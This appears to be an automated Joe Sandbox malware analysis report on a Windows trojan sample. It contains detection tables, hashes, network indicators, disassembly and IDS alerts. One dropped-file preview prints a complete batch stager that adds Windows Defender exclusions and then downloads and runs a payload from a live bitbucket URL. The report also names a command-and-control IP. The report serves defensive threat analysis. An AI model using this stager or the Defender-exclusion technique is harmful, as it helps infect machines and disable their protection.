              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation
              Proc Filesystem11
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Behavior Graph ID: 1580296
Sample: Gq48hjKhZf.exe
Startdate: 24/12/2024
Architecture: WINDOWS
Score: 100

37 s3-w.us-east-1.amazonaws.com 2->37
39 s3-1-w.amazonaws.com 2->39
41 2 other IPs or domains 2->41
53 Suricata IDS alerts for network traffic 2->53
55 Antivirus detection for dropped file 2->55
57 Multi AV Scanner detection for dropped file 2->57
59 8 other signatures 2->59
9 Gq48hjKhZf.exe 8 2->9 started
33 C:\Users\user\AppData\Local\Temp\...\AC31.bat, ASCII 9->33 dropped
12 cmd.exe 1 9->12 started
61 Suspicious powershell command line found 12->61
63 Tries to download and execute files (via powershell) 12->63
65 Adds a directory exclusion to Windows Defender 12->65
15 cmd.exe 1 12->15 started
17 powershell.exe 23 12->17 started
20 powershell.exe 23 12->20 started
22 2 other processes 12->22
26 AHPOBS.exe 2 15->26 started
49 Loading BitLocker PowerShell Module 17->49
51 Powershell drops PE file 17->51
43 s3-w.us-east-1.amazonaws.com 3.5.8.193, 443, 49705 AMAZON-AESUS United States 22->43
45 bitbucket.org 185.166.143.49, 443, 49704 AMAZON-02US Germany 22->45
31 C:\Users\user\AppData\Local\Temp\AHPOBS.exe, PE32 22->31 dropped
47 172.232.216.250, 4000, 49808, 49859 AKAMAI-ASN1EU United States 26->47
35 C:\Users\user\AppData\Roaming\...\svhost.exe, PE32 26->35 dropped
67 Antivirus detection for dropped file 26->67
69 Multi AV Scanner detection for dropped file 26->69
71 Machine Learning detection for dropped file 26->71

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
Gq48hjKhZf.exe | 57% | Virustotal |
Gq48hjKhZf.exe | 39% | ReversingLabs |
Gq48hjKhZf.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Windata\svhost.exe | 100% | Avira | HEUR/AGEN.1321335
C:\Users\user\AppData\Local\Temp\AHPOBS.exe | 100% | Avira | HEUR/AGEN.1321335
C:\Users\user\AppData\Roaming\Windata\svhost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\AHPOBS.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\AHPOBS.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\Temp\AHPOBS.exe | 71% | Virustotal |
C:\Users\user\AppData\Roaming\Windata\svhost.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
C:\Users\user\AppData\Roaming\Windata\svhost.exe | 71% | Virustotal |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 3.5.8.193 | true | false | | high
bitbucket.org | 185.166.143.49 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/files/beta/autoit/archive/sqlite/SQLite3O:Te | AHPOBS.exe, 0000000A.00000002.3917281213.0000000003E85000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ip-score.com/checkip/ | AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.amazonaws.com/ | AHPOBS.exe, 0000000A.00000002.3917281213.0000000003E85000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
172.232.216.250 | unknown | United States | 20940 | AKAMAI-ASN1EU | true
3.5.8.193 | s3-w.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580296
Start date and time: 2024-12-24 09:01:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Gq48hjKhZf.exe
renamed because original name is a hash value
Original Sample Name: 454bf064c19d363b154a419fc69dc693.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@14/14@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 101
• Number of non-executed functions: 262
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.166.143.49 | http://jasonj002.bitbucket.io/ | malicious | HTMLPhisher | jasonj002.bitbucket.io/
172.232.216.250 | 7uJ95NO82G.exe | malicious | LodaRAT |
3.5.8.193 | https://iuzehfkrzhrkz95r.s3.amazonaws.com/url.html | malicious | Phisher |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bitbucket.org | 2oM46LNCOo.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | tTGxYWtjG5.exe | malicious | LummaC | 185.166.143.48
bitbucket.org | iaLId0uLUw.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | yuij5p5p3W.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | NAnOVCOt4L.exe | malicious | LummaC | 185.166.143.50
bitbucket.org | fkawMJ7FH8.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine, Stealc | 185.166.143.48
bitbucket.org | OtHVIQ2ge4.exe | malicious | LummaC | 185.166.143.49
bitbucket.org | fr2Mul3G6m.exe | malicious | LummaC | 185.166.143.49
bitbucket.org | payment_3493.pdf | malicious | Unknown | 185.166.143.48
s3-w.us-east-1.amazonaws.com | 2oM46LNCOo.exe | malicious | LummaC | 52.217.14.36
s3-w.us-east-1.amazonaws.com | tTGxYWtjG5.exe | malicious | LummaC | 16.15.177.52
s3-w.us-east-1.amazonaws.com | iaLId0uLUw.exe | malicious | LummaC | 3.5.17.0
s3-w.us-east-1.amazonaws.com | yuij5p5p3W.exe | malicious | LummaC | 54.231.128.9
s3-w.us-east-1.amazonaws.com | http://plnbl.io/review/FSUQBEfTfzwH | malicious | Unknown | 54.231.128.17
s3-w.us-east-1.amazonaws.com | NAnOVCOt4L.exe | malicious | LummaC | 3.5.27.149
s3-w.us-east-1.amazonaws.com | fkawMJ7FH8.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine, Stealc | 3.5.29.203
s3-w.us-east-1.amazonaws.com | OtHVIQ2ge4.exe | malicious | LummaC | 52.217.75.84
s3-w.us-east-1.amazonaws.com | fr2Mul3G6m.exe | malicious | LummaC | 3.5.25.145
s3-w.us-east-1.amazonaws.com | payment_3493.pdf | malicious | Unknown | 3.5.29.153
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AKAMAI-ASN1EU | L5Kgf2Tvkc.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | 7uJ95NO82G.exe | malicious | LodaRAT | 172.232.216.250
AKAMAI-ASN1EU | nabx86.elf | malicious | Unknown | 23.7.216.65
AKAMAI-ASN1EU | Violated Heroine_91zbZ-1.exe | malicious | Unknown | 184.85.182.130
AKAMAI-ASN1EU | [External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.eml | malicious | Unknown | 23.195.39.65
AKAMAI-ASN1EU | ChoForgot.exe | malicious | Vidar | 23.219.82.25
AKAMAI-ASN1EU | nTyPEbq9wQ.lnk | malicious | Unknown | 104.126.116.105
AKAMAI-ASN1EU | jSFUzuYPG9.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | HK8IIasL9i.exe | malicious | LummaC | 23.55.153.106
AKAMAI-ASN1EU | OGBLsboKIF.exe | malicious | LummaC | 23.55.153.106
AMAZON-02US | 2oM46LNCOo.exe | malicious | LummaC | 185.166.143.50
AMAZON-02US | tTGxYWtjG5.exe | malicious | LummaC | 185.166.143.48
AMAZON-02US | iaLId0uLUw.exe | malicious | LummaC | 185.166.143.50
AMAZON-02US | yuij5p5p3W.exe | malicious | LummaC | 185.166.143.50
AMAZON-02US | sh4.nn.elf | malicious | Okiru | 54.171.230.55
AMAZON-02US | mipsel.nn.elf | malicious | Okiru | 54.171.230.55
AMAZON-02US | armv5l.elf | malicious | Unknown | 35.163.11.216
AMAZON-02US | splm68k.elf | malicious | Unknown | 3.138.165.134
AMAZON-02US | nklarm7.elf | malicious | Unknown | 3.115.112.216
AMAZON-AESUS | x6Rd1DzUJA.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | SzXZZDlkVE.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | ijn8pyFXSP.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | WzyLDvldFI.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | PhwUGyok2i.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | nRYpZg6i5E.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | RGU8qibimk.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | FMuiLqyqaT.exe | malicious | Clipboard Hijacker, Cryptbot | 34.226.108.155
AMAZON-AESUS | iaLId0uLUw.exe | malicious | LummaC | 3.5.17.0
AMAZON-AESUS | armv6l.elf | malicious | Unknown | 18.207.104.163
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | singl6.mp4.hta | malicious | LummaC | 3.5.8.193, 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | hnskdfgjgar22.bat | malicious | Abobus Obfuscator, Braodo | 3.5.8.193, 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | Proforma Invoice.exe | malicious | MassLogger RAT | 3.5.8.193, 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 3.5.8.193, 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | WO.exe | malicious | Metasploit | 3.5.8.193, 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | ChoForgot.exe | malicious | Vidar | 3.5.8.193, 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | payment_3493.pdf | malicious | Unknown | 3.5.8.193, 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | 1lhZVZx5nD.exe | malicious | Stealc, Vidar | 3.5.8.193, 185.166.143.49
3b5074b1b5d032e5620f69f9f700ff0e | Archivo-PxFkiLTWYG-23122024095010.hta | malicious | Unknown | 3.5.8.193, 185.166.143.49

Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\AHPOBS.exe | 7uJ95NO82G.exe | malicious | LodaRAT
C:\Users\user\AppData\Roaming\Windata\svhost.exe | 7uJ95NO82G.exe | malicious | LodaRAT
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:@...e...........................................................
                                    Process:C:\Users\user\Desktop\Gq48hjKhZf.exe
                                    File Type:ASCII text, with CRLF, LF line terminators
                                    Category:dropped
                                    Size (bytes):347
                                    Entropy (8bit):5.290067082162046
                                    Encrypted:false
                                    SSDEEP:6:NS0o++AI4eGgdEYzPs++AIIzVr+fxiA8q2pPKB++AI4eGgdEEFACp+tXzp3:NS9EsuUUEVr+ZiRsBEsuEJUtjN
                                    MD5:16E1A923C995AA08BDF178EF8DEE95D4
                                    SHA1:271758F6726EA175CC31F4845810E348B8CA75DB
                                    SHA-256:E54DCAAC4D1D94F6596EC6BB97D9D86E48C8C55C4F4130651D78CFEF49262C54
                                    SHA-512:62A8A2EFB82D78780417E3693B89EFC4C05592DF28C4490FD1B6A1B81E2D0FF50A07809CE2BCF06B0755BA79C1CC903B3EBD456B87385D0614AE545C8C0F8434
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat, Author: Joe Security
                                    Preview:@shift /0..@echo off.powershell /nop /com "Add-MpPreference -ExclusionPath %TEMP%".powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', '%TEMP%\AHPOBS.exe')";.powershell /nop /com "Add-MpPreference -ExclusionProcess %TEMP%\AHPOBS.exe".cmd.exe /c %TEMP%\AHPOBS.exe;..
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1136091
                                    Entropy (8bit):7.393176843129186
                                    Encrypted:false
                                    SSDEEP:24576:0RmJkcoQricOIQxiZY1iaPHwLDjz1yoVzUPbLwzmmhZJY5:RJZoQrbTFZY1iaPHUMoVzUPgpzJY5
                                    MD5:A9C526F3A276012D554AC382A90BCA3D
                                    SHA1:34CAB3F18D9A7EFA115E154609FDED0C2B96F9C8
                                    SHA-256:7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
                                    SHA-512:7C62FBDC6CB645B0A9056786ED3277A1016B47949F6193271A1474B573C4F7C3845E518BAB207C1D4E4D85AEE64BB4EC6CC5605534C3F6E52D24248007D4E5C1
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 74%
                                    • Antivirus: Virustotal, Detection: 71%, Browse
                                    Joe Sandbox View:
                                    • Filename: 7uJ95NO82G.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.................................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1136091
                                    Entropy (8bit):7.393176843129186
                                    Encrypted:false
                                    SSDEEP:24576:0RmJkcoQricOIQxiZY1iaPHwLDjz1yoVzUPbLwzmmhZJY5:RJZoQrbTFZY1iaPHUMoVzUPgpzJY5
                                    MD5:A9C526F3A276012D554AC382A90BCA3D
                                    SHA1:34CAB3F18D9A7EFA115E154609FDED0C2B96F9C8
                                    SHA-256:7230B549346DBAB880D1D713D8C9DFC1005065C0F0CEBB16AD4F1A15F05D088A
                                    SHA-512:7C62FBDC6CB645B0A9056786ED3277A1016B47949F6193271A1474B573C4F7C3845E518BAB207C1D4E4D85AEE64BB4EC6CC5605534C3F6E52D24248007D4E5C1
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 74%
                                    • Antivirus: Virustotal, Detection: 71%
                                    Joe Sandbox View:
                                    • Filename: 7uJ95NO82G.exe, Detection: malicious
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.................................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Entropy (8bit):6.461642473177525
                                    TrID:
                                    • Win64 Executable GUI (202006/5) 92.64%
                                    • Win64 Executable (generic) (12005/4) 5.51%
                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                    • DOS Executable Generic (2002/1) 0.92%
                                    • VXD Driver (31/22) 0.01%
                                    File name:Gq48hjKhZf.exe
                                    File size:123'392 bytes
                                    MD5:454bf064c19d363b154a419fc69dc693
                                    SHA1:98beb972b52d32c846e9e485cbf17e9211cbe5ab
                                    SHA256:6a46b3762d71b47d0c728e967ee9129f523689ff70196a953baa3f60c85a26b5
                                    SHA512:4c87c628a5b8123faf35c9ef072e91463024f3429ee00998753bca58c77d34f31fd4b55afca7e4a4f25dff837e6db72df59f13f27430b1c16c0c13845b4e6df7
                                    SSDEEP:3072:kV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnP8B:Jt5hBPi0BW69hd1MMdxPe9N9uA069TBc
                                    TLSH:24C3276AB2E01198EBF581F6D5920746EB7074321715A3DB5B7863B31B2B8C58F3D3A0
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.b...|.................@.............................0.............................................
                                    Icon Hash:00928e8e8686b000
                                    Entrypoint:0x140001000
                                    Entrypoint Section:.code
                                    Digitally signed:false
                                    Imagebase:0x140000000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                    DLL Characteristics:
                                    Time Stamp:0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:7182b1ea6f92adbf459a2c65d8d4dd9e
                                    Instruction
                                    dec eax
                                    sub esp, 28h
                                    dec ecx
                                    mov eax, 00000160h
                                    dec eax
                                    xor edx, edx
                                    dec eax
                                    mov ecx, 40020444h
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    call 00007F376CC138E8h
                                    dec eax
                                    xor ecx, ecx
                                    call 00007F376CC138E6h
                                    dec eax
                                    mov dword ptr [0001F420h], eax
                                    dec ebp
                                    xor eax, eax
                                    dec eax
                                    mov edx, 00001000h
                                    dec eax
                                    xor ecx, ecx
                                    call 00007F376CC138D3h
                                    dec eax
                                    mov dword ptr [0001F3FFh], eax
                                    dec eax
                                    mov eax, 4001F090h
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    dec eax
                                    mov dword ptr [0001F43Eh], eax
                                    call 00007F376CC1E90Ah
                                    call 00007F376CC1E599h
                                    call 00007F376CC1A6C0h
                                    call 00007F376CC19CB3h
                                    call 00007F376CC19542h
                                    call 00007F376CC19211h
                                    call 00007F376CC18908h
                                    call 00007F376CC17DBFh
                                    call 00007F376CC139E2h
                                    call 00007F376CC1C8A5h
                                    call 00007F376CC1B104h
                                    dec eax
                                    mov edx, 4001F032h
                                    add dword ptr [eax], eax
                                    add byte ptr [eax], al
                                    dec eax
                                    lea ecx, dword ptr [0001F3C6h]
                                    call 00007F376CC1E932h
                                    dec eax
                                    mov ecx, FFFFFFF5h
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f198 | 0xc8 | .data
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0x630 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1d000 | 0x10d4 | .pdata
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1f6a8 | 0x448 | .data
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .code | 0x1000 | 0x5a99 | 0x5c00 | bf90681e6a2fc3ae2cafaa536804f308 | False | 0.3649796195652174 | data | 5.470810722545147 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .text | 0x7000 | 0x105b5 | 0x10600 | 8a1a401c4bd106ea802d83f827d2ddd2 | False | 0.4909798425572519 | data | 6.359859898514709 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x18000 | 0x4b3d | 0x4c00 | 546e073a6443174d5e09f21ab6d487ce | False | 0.6635999177631579 | VAX-order 68k Blit mpx/mux executable | 6.6666895682624485 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .pdata | 0x1d000 | 0x10d4 | 0x1200 | e81bd35fde0f70c926459e823327da76 | False | 0.4683159722222222 | data | 4.881026996790752 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x1f000 | 0x2318 | 0x1600 | 607c61f631092ad3ff4000c586299685 | False | 0.32848011363636365 | data | 4.298511113489139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0x22000 | 0x630 | 0x800 | fc2c7c1a0f7df25abface4beeca1c3d9 | False | 0.53125 | data | 5.902828763075756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_RCDATA | 0x2221c | 0x1 | very short file (no magic) | | | 9.0
                                    RT_RCDATA | 0x22220 | 0xe | zlib compressed data | | | 1.5714285714285714
                                    RT_RCDATA | 0x22230 | 0xc | data | | | 1.6666666666666667
                                    RT_RCDATA | 0x2223c | 0x151 | data | | | 1.032640949554896
                                    RT_MANIFEST | 0x22390 | 0x2a0 | XML 1.0 document, ASCII text, with very long lines (672), with no line terminators | | | 0.5520833333333334
                                    DLL | Import
                                    msvcrt.dll | memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
                                    KERNEL32.dll | GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
                                    SHELL32.DLL | ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                    WINMM.DLL | timeBeginPeriod
                                    OLE32.DLL | CoInitialize, CoTaskMemFree
                                    SHLWAPI.DLL | PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                                    USER32.DLL | CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                    GDI32.DLL | GetStockObject
                                    COMCTL32.DLL | InitCommonControlsEx
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2024-12-24T09:02:05.166648+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49982 | 172.232.216.250 | 4000 | TCP
                                    2024-12-24T09:02:05.166648+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49961 | 172.232.216.250 | 4000 | TCP
                                    2024-12-24T09:02:05.166648+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49983 | 172.232.216.250 | 4000 | TCP
                                    2024-12-24T09:02:05.166648+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.5 | 49859 | 172.232.216.250 | 4000 | TCP
